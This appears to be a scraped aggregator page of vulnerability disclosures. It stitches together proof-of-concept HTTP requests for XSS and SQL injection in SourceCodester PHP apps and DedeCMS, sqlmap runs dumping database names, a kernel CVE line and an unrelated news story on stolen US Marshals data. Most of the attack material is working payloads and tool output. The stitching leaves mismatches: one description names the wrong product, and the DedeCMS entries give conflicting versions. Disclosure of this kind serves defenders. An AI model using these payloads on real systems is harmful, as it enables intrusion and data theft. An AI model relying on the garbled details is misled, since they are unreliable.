Yoga Class Registration System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Yoga Class Registration System - Cross Site Scripting Vulnerability (Authenticated)# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Online Pizza Ordering System allows remote authenticated users to execute JavaScript code. ## Request PoC```GET /php-ycrs/admin/?page=classes%2fmanage_class58913'%3balert(1)%2f%2f575&id=2 HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-ycrs/admin/?page=classesCookie: PHPSESSID=intlfrkii1gsh9pjgeoo0dhu3b```

Yoga Class Registration System 1.0 Cross Site Scripting

Online Pizza Ordering System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Pizza Ordering System 1.0 - "id" SQLi# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the (/php-opos/index.php) page in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands by "id" parameter. ## Request PoC```GET /php-opos/index.php?page=category&id=1' HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-opos/Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20```This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "id" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. ```GET /php-opos/index.php?page=category&id=1'%2b(select*from(select(sleep(10)))a)%2b' HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-opos/Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/php-opos]└─# sqlmap -r sql.txt -p 'id' --batch --dbs --level=3 --risk=2---snip---[13:20:45] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectableGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=category&id=1' AND 9957=9957-- dMoW    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: page=category&id=1' AND (SELECT 9683 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(9683=9683,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JUhz    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=category&id=1' AND (SELECT 1462 FROM (SELECT(SLEEP(5)))HRjs)-- mEaq    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: page=category&id=-1987' UNION ALL SELECT NULL,CONCAT(0x717a6b7071,0x79716851566b7072685458534e4c6f7a75784f50614266454c7746646347794d565a43634b684958,0x716a6b7071)-- ----[13:20:45] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.54, PHP 8.2.0back-end DBMS: MySQL >= 5.0 (MariaDB fork)[13:20:45] [INFO] fetching database names[13:20:45] [INFO] retrieved: 'information_schema'[13:20:46] [INFO] retrieved: 'mysql'[13:20:46] [INFO] retrieved: 'opos_db'[13:20:46] [INFO] retrieved: 'performance_schema'[13:20:46] [INFO] retrieved: 'phpmyadmin'----snip----```

Online Pizza Ordering System 1.0 SQL Injection

Human Resources Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Human Resources Management System - HRM - Multiple SQLi# Date: 16/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip# Version: 1.0# Tested on: Windows## Description A Blind SQL injection vulnerability in the login page (/hrm/controller/login.php) in Human Resources Management System allows remote unauthenticated attackers to execute remote command through arbitrary SQL commands by "name" parameter. ## Request PoC```POST /hrm/controller/login.php HTTP/1.1Host: 192.168.1.103Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.103/hrm/Content-Type: application/x-www-form-urlencodedContent-Length: 73name=test@testdomain.com'&password=test&submit=Sign+In```This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "name" parameter, the response to request was 302 status code with message of Found, but 20 seconds later, which indicates that our sleep 20 command works. ```POST /hrm/controller/login.php HTTP/1.1Host: 192.168.1.103Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.103/hrm/Content-Type: application/x-www-form-urlencodedContent-Length: 114name=test@testdomain.com'%2b(select*from(select(sleep(20)))a)%2b'&password=test&submit=Sign+In```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/hrm]└─# sqlmap -r sqli.txt -p 'name' --batch --dbs --level=3 --risk=2---snip----[15:49:36] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns'POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:---Parameter: name (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: name=test@testdomain.com' AND 3287=(SELECT (CASE WHEN (3287=3287) THEN 3287 ELSE (SELECT 8737 UNION SELECT 2671) END))-- -&password=a5P!s3v!K8&submit=Sign In    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: name=test@testdomain.com' OR (SELECT 6958 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6958=6958,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VHwA&password=a5P!s3v!K8&submit=Sign In    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: name=test@testdomain.com' AND (SELECT 1760 FROM (SELECT(SLEEP(5)))LTmV)-- fhJt&password=a5P!s3v!K8&submit=Sign In---[15:49:36] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54, PHP----snip----```## The "password" parameter in the POST request is also vulnerable. It can be exploited in the same way.

Human Resources Management System 1.0 SQL Injection

In the Linux kernel before 6.1.3, fs/ntfs3/inode.c does not validate the attribute name offset. An unhandled page fault may occur.

CVE-2022-48424

A vulnerability classified as critical was found in SourceCodester Automatic Question Paper Generator System 1.0. This vulnerability affects unknown code of the file users/question_papers/manage_question_paper.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223336.

BUG\_Author:0019FF

Vulnerability File: /aqpg/users/question\_papers/manage\_question\_paper.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=1' and 999=999 and 'o'='o

    GET /aqpg/users/question_papers/manage_question_paper.php?id=1%27%20and%20999=999%20and%20%27o%27=%27o HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=gqm4opdrfvm9njhrtmcivvn20b
    Connection: close
    

The sql statement is executed correctly

Payload2:id=1' and 999=996 and 'o'='p

    GET /aqpg/users/question_papers/manage_question_paper.php?id=1%27%20and%20999=996%20and%20%27o%27=%27p HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=gqm4opdrfvm9njhrtmcivvn20b
    Connection: close
    

The sql statement was executed incorrectly, causing the page not to be echoed normally

Payload3:id=1' and (select 9 from (select(sleep(15)))b) and 't'='t

    GET /aqpg/users/question_papers/manage_question_paper.php?id=1%27%20and%20(select%209%20from%20(select(sleep(15)))b)%20and%20%27t%27=%27t HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=gqm4opdrfvm9njhrtmcivvn20b
    Connection: close
    

The server response time is 15 seconds

CVE-2023-1474: bug_report/SQLi.md at main · 19FF/bug_report

A vulnerability, which was classified as critical, has been found in SourceCodester Medicine Tracker System 1.0. This issue affects some unknown processing of the file medicines/view_details.php of the component GET Parameter Handler. The manipulation of the argument GET leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223283.

BUG\_Author:godgua

Vulnerability File: /php-mts/app/medicines/view\_details.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=-1' union all select null,null,null,concat(0x51525354,0x41424344,0x61626364),null,null-- -

    GET /php-mts/app/medicines/view_details.php?id=-1%27%20union%20all%20select%20null,null,null,concat(0x51525354,0x41424344,0x61626364),null,null--%20- HTTP/1.1
    Host: 192.168.0.100
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=t194o00fbqgbautftistta6ap2
    Connection: close
    

union query success

Payload2:id=1' and (select 2 from (select(sleep(15)))a) AND 'c'='c

    GET /php-mts/app/medicines/view_details.php?id=1%27%20and%20(select%202%20from%20(select(sleep(15)))a)%20AND%20%27c%27=%27c HTTP/1.1
    Host: 192.168.0.100
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=t194o00fbqgbautftistta6ap2
    Connection: close
    

The server's response time is 15 seconds

CVE-2023-1439: bug_report/SQLi-1.md at main · GodGua/bug_report

By Waqas
The hacker is selling 350 GB worth of data for $150,000 supervised by the forum’s guarantor.
This is a post from HackRead.com Read the original post: US Marshals Service Data Sold on Russian Hacker Forum

****The hacker claims that, among other sensitive data, the stolen information includes data about convicts, drug cartels, witnesses, and individuals enrolled in the agency’s witness protection program.****

In late February 2023, the US Marshals Service (USMS) suffered a ransomware attack, leading to all sorts of speculation. Now, however, a hacker is selling data that they claim belongs to the USMS for $150,000.

For readers outside the United States, the U.S. Marshals Service (USMS) is a high-profile government agency associated with the U.S. Department of Justice, which offers protection to government witnesses and their families.

**The Stolen US Marshals Service Data**

The stolen data, which is being offered for sale by an unknown threat actor on a Russian cybercrime and hacker forum operating on both the **Dark Web** and the clearnet, allegedly include military base photos, wiretap data belonging to USMS, drone footage of military bases, and documents on cartels, gang leaders, IDs, and passports.

The data also includes information about convicts, drug cartels, witnesses, and individuals enrolled in the agency’s witness protection program. Additionally, the dataset includes files marked as Top Secret and Confidential, as well as backdoor software for Apple devices.

This is what the hacker has to say about the alleged US Marshals Service data (Image credit: Hackread.com)

**Are These Claims Authentic?**

Although no ransomware group has claimed responsibility for the attack yet, the hacker who posted the advert claimed that the dataset was stolen from the USMS between 2021 and February 2023. However, the post was uploaded from a one-day-old account, and the author did not provide any data samples as evidence.

It is worth noting that the threat actor suggests using a middleman to ensure a successful sale, in this case, the forum’s administrator. The hacker’s willingness to use a third-party and their confidence in the quality of the stolen information indicates that the threat should be taken seriously.

The USMS had previously announced in February 2023 that it had fallen victim to a major ransomware attack, which compromised sensitive data on known fugitives, USMS employees, and legal proceedings.

At the time, the agency stated that data related to individuals enrolled in the witness protection program had not been accessed.

1.  **Hackers post data of thousands of Federal agents**
2.  **Avast found backdoor in US Federal Agency Network**
3.  **Top US Federal Agencies Hacked by Russian Hackers**
4.  **Hackers access domain controller of US Federal network**
5.  **Federal agency hacked leveraging compromised credentials**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

US Marshals Service Data Sold on Russian Hacker Forum

School Registration and Fee System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at/bilal final/edit_user.php.

Permalink

Cannot retrieve contributors at this time

**School Registration and Fee System v1.0 has SQL injection**

BUG\_Author:Forsan

Vulnerability File: /bilal final/edit\_user.php

GET parameter 'id' exists SQL injection vulnerability

Payload1: http://localhost/bilal%20final/edit\_user.php?id=3%27

    GET /bilal%20final/edit_user.php?id=3%27 HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=1n5lla2368pm1f9736l2bfp58a
    Connection: close
    

An error occurred in the sql statement

Payload2: http://localhost/bilal%20final/edit\_user.php?id=3%27%20and%20(select%204%20from%20(select(sleep(5)))a)--%20b

    GET /bilal%20final/edit_user.php?id=3%27%20and%20(select%204%20from%20(select(sleep(5)))a)--%20b HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=1n5lla2368pm1f9736l2bfp58a
    Connection: close
    

The server's response time is 5 seconds

CVE-2023-27041: bug_report/SQLi-1.md at main · forsean/bug_report

SQL injection vulnerability found in DedeCMS v.5.7.106 allows a remote attacker to execute arbitrary code via the rank_* parameter in the /dedestory_catalog.php endpoint.

**Description**

Admin backend story catalog blind SQL injection via post parameters.

**Affected Version**

DedeCMS <= 5.7.160

**POC**

1.  Login to admin backend management.
2.  Request to /dede/story_catalog.php with GET parameter action=uprank and POST parameters rank_1=1'+and+sleep(3)+and+'1, this payload will lead to a time-based SQL injection.
3.  Requires PHP ≤ 5 and MySQL ≤ 5.5, and the story component contains at least one record in database.
4.  In the source code of /dede/story_catalog.php, when the GET parameter action is uprank, the POST value which the key contains rank_ will be directly joined into the update SQL statement, which lead to SQL update injection, finally the joint statement will be passed through mysqli_query, but this function only return boolean value when the query string is an update statement, that is why this is a blind injection.

Full POC request:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

POST /cms/dedecms/dede/story\_catalog.php?action=uprank HTTP/1.1  
Host: 192.168.0.8  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: menuitems=1\_1%2C2\_1%2C3\_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; \_csrf\_name\_273c7533=e59946ea73ad488a9da6a03897480ac5; \_csrf\_name\_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV\_GOBACK\_URL=%2Fcms%2Fdedecms%2Fdede%2Fstory\_books.php  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 29  
  
rank\_1\=1'+and+sleep(3)+and+'1  

**Reference**

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2023-27709: DedeCMS V5.7.160 Backend Blind SQL Injection

SQL injection vulnerability found in DedeCMS v.5.7.106 allows a remote attacker to execute arbitrary code via the rank_* parameter in the /dede/group_store.php endpoint.

**Description**

Admin backend group store blind SQL injection via post parameters.

**Affected Version**

DedeCMS <= 5.7.160

**POC**

1.  Login to admin backend management.
2.  Request to /dede/group_store.php with GET parameter action=uprank and POST parameters rank_1=1'+and+sleep(3)+and+'1, this payload will lead to a time-based SQL injection.
3.  In the source code of /dede/group_store.php, when the GET parameter action is uprank, the POST value which the key contains rank_ will be directly joined into the update SQL statement, which lead to SQL update injection, finally the joint statement will be passed through mysqli_query, but this function only return boolean value when the query string is an update statement, that is why this is a blind injection.

Full POC request:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  

POST /cms/dedecms/dede/group\_store.php?action=uprank HTTP/1.1  
Host: 192.168.0.8  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: menuitems=1\_1%2C2\_1%2C3\_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; \_csrf\_name\_273c7533=e59946ea73ad488a9da6a03897480ac5; \_csrf\_name\_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV\_GOBACK\_URL=%2Fcms%2Fdedecms%2Fdede%2Fgroup\_store.php  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 29  
  
rank\_1\=1'+and+sleep(3)+and+'1  

**Reference**

> Reported by Srpopty, vulnerability discovered by using Corax.

Tag

#apple